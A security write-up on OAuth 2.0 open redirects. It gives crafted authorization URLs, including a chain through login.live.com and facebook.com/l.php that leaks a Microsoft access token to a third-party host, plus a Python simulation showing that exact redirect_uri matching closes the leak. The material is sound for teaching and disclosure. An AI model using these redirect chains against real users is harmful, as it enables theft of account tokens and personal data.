1. Open Redirect

Open redirect in RFC 6749, aka 'The OAuth 2.0 Authorization Framework'

Assume an attacker has registered a client application of their own at the authorization server (victim.com below), with http://attacker.com as its registered redirection URI.

Then the attacker can craft a URI of the form

http://victim.com/authorize?response_type=code&client_id=bc88FitX1298KPj2WS259BBMa9_KCfL3&scope=WRONG_SCOPE&**redirect_uri**=**http://attacker.com**

According to Section 4.1.2.1 of the RFC, the authorization server answers this by redirecting the user agent back to attacker.com with error=invalid_scope in the query string, and nothing in that section requires any user interaction first. A wrong scope parameter is used here, but any failure reason other than a missing or invalid redirection URI (or client identifier) triggers the same redirect; only those cases must be reported to the resource owner instead of being redirected.

<aside> 💡 Sometimes, in order to pull off an attack, you need an open redirect. It is only one small link in the chain, but an essential one.

</aside>

2. How Microsoft is giving your data to Facebook… and everyone else

If you try modifying the redirect_uri parameter of Facebook's client at login.live.com (client_id 0000000044002503 below), you'll notice that the token is issued to any URL within the facebook.com domain: the redirection URI is checked against the domain only, not against the full registered URI.

So, to leak the OAuth token to a malicious third party, an open redirect within the facebook.com domain is required. Facebook's own OAuth dialog provides one in exactly the way Section 1 describes: an invalid scope makes it redirect to the client's registered redirect_uri with an error, and here that client's redirect_uri is simcracy.com.

https://www.facebook.com/dialog/oauth?type=web_server&scope=invalid&display=popup&client_id=260755904036570&redirect_uri=http://simcracy.com

Chained together, with facebook.com/l.php (a redirector on the facebook.com domain that forwards the browser to its u= parameter) as the intermediate hop. Because response_type=token puts the access token in the URL fragment, and browsers carry a fragment across every redirect whose Location has none of its own, the token arrives at simcracy.com:

https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fh[]%26u%3Dgraph.facebook.com%2Foauth%2Fauthorize%3Ftype%3Dweb_server%26scope%3De%26client_id%3D260755904036570%26redirect_uri%3Dhttp%3A%2F%2Fsimcracy.com

URL decoded ⇒

https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=http://www.facebook.com/l.php?h[]&u=graph.facebook.com/oauth/authorize?type=web_server&scope=e&client_id=260755904036570&redirect_uri=http://simcracy.com
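As an added example (not code from RFC 6749 or from either post above), the following Python models both sections: an authorization endpoint that applies Section 4.1.2.1 under two redirect_uri policies, the exact string comparison the RFC prescribes and a lax domain-only match like the one login.live.com applied, plus a browser that follows the resulting redirects and inherits the URL fragment. The client registrations, scopes, token value, the l.php behaviour (forwarding to its u= parameter) and the rebuilt, properly percent-encoded chain URL are assumptions; only the hosts and client_id values come from the URLs above.

```python
"""Model of redirect_uri handling at OAuth 2.0 authorization endpoints.
Added example; client registrations, scopes, token and l.php behaviour
are constructed assumptions."""
from urllib.parse import parse_qs, urlencode, urlsplit

TOKEN = "EAAconstructedToken"  # constructed placeholder, not a real token

# Constructed registrations, keyed by authorization-server host.
AUTH_SERVERS = {
    "victim.com": {  # section 1: the attacker registered this client himself
        "bc88FitX1298KPj2WS259BBMa9_KCfL3": {
            "redirect_uris": ["http://attacker.com"], "scopes": {"read"}},
    },
    "login.live.com": {  # section 2: Facebook's client at Microsoft (assumed URI)
        "0000000044002503": {
            "redirect_uris": ["https://www.facebook.com/login/live.php"],
            "scopes": {"wli.contacts_emails"}},
    },
    "graph.facebook.com": {  # section 2: a third-party Facebook app (assumed)
        "260755904036570": {
            "redirect_uris": ["http://simcracy.com"], "scopes": {"email"}},
    },
}

VICTIM_URL = ("http://victim.com/authorize?response_type=code"
              "&client_id=bc88FitX1298KPj2WS259BBMa9_KCfL3"
              "&scope=WRONG_SCOPE&redirect_uri=http://attacker.com")


def exact_match(redirect_uri, registered):
    """RFC 6749 s3.1.2.3: simple string comparison with the registered URI."""
    return redirect_uri in registered


def domain_match(redirect_uri, registered):
    """Lax check modelling login.live.com: accept any URI whose host lies
    within a registered host's registrable domain (last two labels)."""
    host = urlsplit(redirect_uri).hostname or ""
    for reg in registered:
        dom = ".".join((urlsplit(reg).hostname or "").split(".")[-2:])
        if host == dom or host.endswith("." + dom):
            return True
    return False


def add_query(uri, query):
    return uri + ("&" if "?" in uri else "?") + query


def authorize(host, params, policy):
    """Authorization endpoint: a Location value, or None when the error must
    be shown to the resource owner instead of redirected (s4.1.2.1)."""
    client = AUTH_SERVERS[host].get(params.get("client_id"))
    redirect_uri = params.get("redirect_uri")
    if (client is None or redirect_uri is None
            or not policy(redirect_uri, client["redirect_uris"])):
        return None  # bad client_id / redirect_uri: MUST NOT redirect
    if params.get("scope") not in client["scopes"]:
        return add_query(redirect_uri, "error=invalid_scope")  # redirected!
    # Resource owner assumed already logged in and consented earlier.
    if params.get("response_type") == "token":
        return redirect_uri + "#access_token=%s&token_type=bearer" % TOKEN
    return add_query(redirect_uri, "code=constructedCode")


def next_hop(url, policy):
    """Server side of one request: the Location it answers with, or None."""
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.hostname in AUTH_SERVERS:
        return authorize(parts.hostname, params, policy)
    if parts.hostname == "www.facebook.com" and parts.path == "/l.php":
        return params.get("u")  # assumed: link redirector forwards to u=
    return None  # ordinary site: final destination


def follow(url, policy, max_hops=6):
    """Browser side: follow redirects; a Location without a fragment inherits
    the current fragment (RFC 7231 s7.1.2), so #access_token= rides along."""
    for _ in range(max_hops):
        loc = next_hop(url, policy)
        if loc is None:
            return url
        if "#" not in loc and "#" in url:
            loc += "#" + url.split("#", 1)[1]
        url = loc
    raise RuntimeError("too many redirects")


def build_chain():
    """The login.live.com URL above, rebuilt with one layer of encoding per
    nesting level so each server decodes exactly its own parameters."""
    fb = "https://graph.facebook.com/oauth/authorize?" + urlencode({
        "type": "web_server", "scope": "e",
        "client_id": "260755904036570", "redirect_uri": "http://simcracy.com"})
    shim = "http://www.facebook.com/l.php?" + urlencode({"u": fb})
    return "https://login.live.com/oauth20_authorize.srf?" + urlencode({
        "client_id": "0000000044002503", "response_type": "token",
        "scope": "wli.contacts_emails", "redirect_uri": shim})


def leaked_token(url):
    """access_token carried in the fragment of `url`, or None."""
    return parse_qs(urlsplit(url).fragment).get("access_token", [None])[0]


if __name__ == "__main__":
    print("section 1, exact match:", follow(VICTIM_URL, exact_match))
    print("chain, domain match   :", follow(build_chain(), domain_match))
    print("chain, exact match    :", follow(build_chain(), exact_match))
```

Running it shows the three behaviours the page describes: the Section 1 URL lands on attacker.com?error=invalid_scope even under exact matching, because the attacker registered that URI and the RFC mandates the redirect; the chained URL delivers the access_token fragment to simcracy.com when login.live.com only checks the domain; and the same chain stops at login.live.com with an error page once the redirection URI must match the registered string exactly. Exact matching therefore closes the Section 2 leak, while the Section 1 redirect is a property of the RFC itself.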